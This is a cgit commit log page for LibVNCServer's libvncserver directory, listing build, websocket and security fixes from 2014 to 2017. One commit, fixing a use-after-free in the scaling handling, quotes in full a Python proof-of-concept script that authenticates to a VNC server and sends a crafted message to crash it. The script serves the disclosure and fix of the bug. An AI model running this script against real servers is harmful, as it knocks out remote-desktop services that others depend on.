summaryrefslogtreecommitdiffstats
path: root/libvncserver
Commit message (Collapse)AuthorAgeFilesLines
* Ensure compatibility with gtk-vnc 0.7.0+Michał Kępień2017-02-141-1/+4
|
* Fix building websockets with GnuTLS.Christian Beier2017-01-281-3/+3
|
* Fix typoChristian Beier2017-01-281-1/+1
|
* Fix websockets buildingChristian Beier2017-01-281-0/+2
|
* Various #ifdef fixes to allow building with MSVC2014Christian Beier2017-01-286-3/+27
|
* Make websockets code build on OSX without SSL.Christian Beier2016-12-301-0/+13
|
* Use unprefixed b64_* functions in websockets code.Christian Beier2016-12-301-5/+5
|
* LibVNCServer: fix starting of an onHold-client in threaded mode.Christian Beier2016-12-281-9/+6
| | | | | | | | Discovered by madscientist159 on 11 Jan 2015: "noted in testing with the threaded server build, whereby if newClientHook() returned RFB_CLIENT_ON_HOLD there was no way to release the hold when the server became ready"
* websockets: Don't supply Sec-WebSocket-Protocol if not in requestKyle Russell2016-12-081-2/+11
|
* Write the correct length for end of headerSamuel Mannehed2016-12-021-1/+1
| | | | Fix for commit 65106d39627499ace4f1ed8701d3ab6c7f97f56f
* httpd: rework mime type handling to recognise more typesChristian Beier2016-11-251-7/+13
|
* Merge pull request #128 from zmedico/autoprobe-selectiveChristian Beier2016-11-201-7/+9
|\ | | | | Support autoPort with ipv4 or ipv6 disabled
| * Support autoPort with ipv4 or ipv6 disabledZac Medico2016-08-141-7/+9
| | | | | | | | | | | | | | | | | | Make it possible to get autoPort behavior with either ipv4 or ipv6 disabled, by setting rfbScreen->ipv6port or rfbScreen->port to a negative number. This will make it possible for x11vnc to enforce its -noipv6 option, as discussed in the following bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=672449
* | Fix some typos (found by codespell)Stefan Weil2016-11-181-1/+1
| | | | | | | | Signed-off-by: Stefan Weil <sw@weilnetz.de>
* | Support systemd socket activationKyle Russell2016-09-212-44/+74
|/
* Merge pull request #84 from plettix/masterChristian Beier2016-06-051-15/+17
|\ | | | | fix for issue 81
| * fix for issue 81plettix2015-07-071-15/+17
| | | | | | use different buffers for decode and encode
* | Avoid calling SSL_pending when connection is already closedGeorge Fleury2016-05-131-1/+1
| | | | | | | | Avoid calling SSL_pending when connection is already closed, calling SSL_pending with connection already closed is crashing. To reproduce, open a secure websocket binay protocol connection with libvncserver compiled with OpenSSL, and when libvncserver is waiting for rfbProcessClientProtocolVersion send any invalid char, it will fail and call rfbCloseClient whith destroy all SSL context, calling SSL_pending after that will generate a invalid access.
* | Merge pull request #103 from rdieter/masterChristian Beier2016-04-243-6/+6
|\ \ | | | | | | use namespaced vnc_max macro (issue #102)
| * | use namespaced rfbMax macro (issue #102)Rex Dieter2016-04-183-6/+6
| | | | | | | | | | | | Not using generic 'max', avoids conflicts with stl_algobase.h
* | | Enable AF_UNIX socket: ignore setsockopt TCP_NODELAY failure.Wen Shuguang2016-04-152-11/+4
|/ /
* | Fix some typos (found by codespell)Stefan Weil2015-10-0910-12/+12
|/ | | | Signed-off-by: Stefan Weil <sw@weilnetz.de>
* Do away with rfbint.h generation and use stdint.h directly instead.Christian Beier2015-05-281-2/+1
|
* Merge pull request #70 from maxnet/masterChristian Beier2015-04-171-0/+8
|\ | | | | httpd: disallow directory traversal
| * httpd: disallow directory traversalFloris Bos2015-03-291-0/+8
| | | | | | | | Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* | Changed C++ style comments to C onesBenjamin Dürholt2015-04-132-2/+2
| |
* | prevent segfaultBenjamin Dürholt2015-04-102-1/+7
| |
* | Set autotools SOVERSION.Peter Spiess-Knafl2015-02-091-0/+1
| |
* | Replace SHA1 implementation with the one from RFC 6234.Christian Beier2015-02-012-2/+2
| |
* | Merge pull request #57 from maxnet/masterChristian Beier2015-01-183-0/+29
|\ \ | |/ | | Fix handling of multiple VNC commands per websockets frame
| * Fix handling of multiple VNC commands per websockets frameFloris Bos2015-01-173-0/+29
| | | | | | | | | | | | | | | | | | | | | | | | | | - When processing input, check if there is any extra data pending in the internal websocket frame and SSL buffers. - Prevents input events lagging behind because they get stuck in one of the buffers. Data pending in our own buffers cannot be detected with select() so was not processed until more input arrives from the network. - Closes # 55 Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* | Merge pull request #56 from maxnet/masterChristian Beier2015-01-161-9/+14
|\ \ | |/ | | Only advertise xvp support when xvpHook is set
| * Only advertise xvp support when xvpHook is setFloris Bos2015-01-161-9/+14
| | | | | | | | | | | | | | Prevent that clients show "reboot" "power down" buttons that are not going to work. Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* | Fix building with mingw-w64.Christian Beier2014-12-301-1/+3
|/
* Update comments regarding rfbClientConnectionGone().Christian Beier2014-10-211-2/+3
|
* Fix Use-After-Free vulnerability in LibVNCServer wrt scaling.Christian Beier2014-10-211-2/+0
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Reported by Ken Johnson <Ken.Johnson1@telus.com>. The vulnerability would occur in both the rfbPalmVNCSetScaleFactor and rfbSetScale cases in the rfbProcessClientNormalMessage function of rfbserver.c. Sending a valid scaling factor is required (non-zero) if (msg.ssc.scale == 0) { rfbLogPerror("rfbProcessClientNormalMessage: will not accept a scale factor of zero"); rfbCloseClient(cl); return; } rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg); rfbLog("rfbSetScale(%d)\n", msg.ssc.scale); rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale); rfbSendNewScaleSize(cl); << This is the call that can trigger a free. return; at the end, both cases there is a call the rfbSendNewScaleSize function, where if the connection is subsequently disconnected after sending the VNC scaling message can lead to a free occurring. else { rfbResizeFrameBufferMsg rmsg; rmsg.type = rfbResizeFrameBuffer; rmsg.pad1=0; rmsg.framebufferWidth = Swap16IfLE(cl->scaledScreen->width); rmsg.framebufferHeigth = Swap16IfLE(cl->scaledScreen->height); rfbLog("Sending a response to a UltraVNC style frameuffer resize event (%dx%d)\n", cl->scaledScreen->width, cl->scaledScreen->height); if (rfbWriteExact(cl, (char *)&rmsg, sz_rfbResizeFrameBufferMsg) < 0) { rfbLogPerror("rfbNewClient: write"); rfbCloseClient(cl); rfbClientConnectionGone(cl); << Call which may can lead to a free. return FALSE; } } return TRUE; Once this function returns, eventually rfbClientConnectionGone is called again on the return from rfbProcessClientNormalMessage. In KRFB server this leads to an attempt to access client->data. POC script to trigger the vulnerability: ---snip--- import socket,binascii,struct,sys from time import sleep class RFB: INIT_3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" AUTH_NO_PASS = "\x01" AUTH_PASS = "\x02" SHARE_DESKTOP = "\x01" def AUTH_PROCESS(self,data,flag): if flag == 0: # Get security types secTypeCount = data[0] secType = {} for i in range(int(len(secTypeCount))): secType[i] = data[1] return secType elif flag == 1: # Get auth result # 0 means auth success # 1 means failure return data[3] def AUTH_PROCESS_CHALLENGE(self, data, PASSWORD): try: from Crypto.Cipher import DES except: print "Error importing crypto. Please fix or do not require authentication" sys.exit(1) if len(PASSWORD) != 8: PASSWORD = PASSWORD.ljust(8, '\0') PASSWORD_SWAP = [self.reverse_bits(ord(PASSWORD[0])),self.reverse_bits(ord(PASSWORD[1])),self.reverse_bits(ord(PASSWORD[2])),self.reverse_bits(ord(PASSWORD[3])),self.reverse_bits(ord(PASSWORD[4])),self.reverse_bits(ord(PASSWORD[5])),self.reverse_bits(ord(PASSWORD[6])),self.reverse_bits(ord(PASSWORD[7]))] PASSWORD = (struct.pack("BBBBBBBB",PASSWORD_SWAP[0],PASSWORD_SWAP[1],PASSWORD_SWAP[2],PASSWORD_SWAP[3],PASSWORD_SWAP[4],PASSWORD_SWAP[5],PASSWORD_SWAP[6],PASSWORD_SWAP[7])) crypto = DES.new(PASSWORD) return crypto.encrypt(data) def reverse_bits(self,x): a=0 for i in range(8): a += ((x>>i)&1)<<(7-i) return a def main(argv): print "Proof of Concept" print "Copyright TELUS Security Labs" print "All Rights Reserved.\n" try: HOST = sys.argv[1] PORT = int(sys.argv[2]) except: print "Usage: python setscale_segv_poc.py <host> <port> [password]" sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\x01": # Send accept for None pass remote.send(vnc.AUTH_NO_PASS) else: print 'The server sent us something weird during auth.' sys.exit(1) # Get result data = remote.recv(1024) # Process result result = vnc.AUTH_PROCESS(data,1) if result == "\x01": # Authentication failure. data = remote.recv(1024) print 'Authentication failure. Server Reason: ' + str(data) sys.exit(1) elif result == "\x00": print "Authentication success." else: print 'Some other authentication issue occured.' sys.exit(1) # Send ClientInit remote.send(vnc.SHARE_DESKTOP) # Send malicious message print "Sending malicious data..." remote.send("\x08\x08\x00\x00") remote.close() if __name__ == "__main__": main(sys.argv) ---snap---
* Fix selData.buttonWidth calculationMaks Naumov2014-10-141-1/+1
| | | Operator "+" has a higher priority than "? :"
* Fix stack-based buffer overflowNicolas Ruff2014-10-071-1/+2
| | | | | | | There was a possible buffer overflow in rfbFileTransferOffer message when processing the FileTime. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix multiple stack-based buffer overflows in file transfer featurenewsoft2014-10-061-8/+30
|
* Make sure that no integer overflow could occur during scalingnewsoft2014-10-061-1/+22
|
* Merge pull request #38 from LibVNC/autotools-fix-revisitedChristian Beier2014-10-021-1/+1
|\ | | | | Autotools fix revisited.
| * Rename obsolete INCLUDES to AM_CPPFLAGSBrian Bidulock2014-10-021-1/+1
| |
* | Close unclosed comments ;-)Johannes Schindelin2014-09-301-2/+2
| | | | | | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* | A forgotten `#ifdef WIN32` broke UNIX build.Daniel Cohen Gindi2014-09-301-0/+2
| |
* | Signal is a fundamental UNIX function, and must be omitted for any windows ↵Daniel Cohen Gindi2014-09-201-1/+1
| | | | | | | | compilation
* | These are UNIX headers, and are not available on MSVCDaniel Cohen Gindi2014-09-201-0/+5
| |
* | On windows, use the Win32 calls for directory enumerations.Daniel Cohen Gindi2014-09-201-3/+78
| | | | | | | | We also do not need the conversion between UNIX values to Windows values in the RTF_FIND_DATA struct, as we already are on windows.
* | Generally adjusting headers for compiling on windows without the mixing of ↵Daniel Cohen Gindi2014-09-203-1/+15
| | | | | | | | Winsock 1 and 2.
* | Just use a macro to bridge to the Win32 version of `mkdir`Daniel Cohen Gindi2014-09-201-5/+6
| | | | | | | | The additional compat_mkdir function was not necessary at all.
* | Fixed a violation of the C89 standard ("declarations must come before ↵Daniel Cohen Gindi2014-09-203-10/+16
| | | | | | | | instructions")
generated by cgit v1.2.1 (git 2.18.0) at 2024-12-27 05:28:44 +0000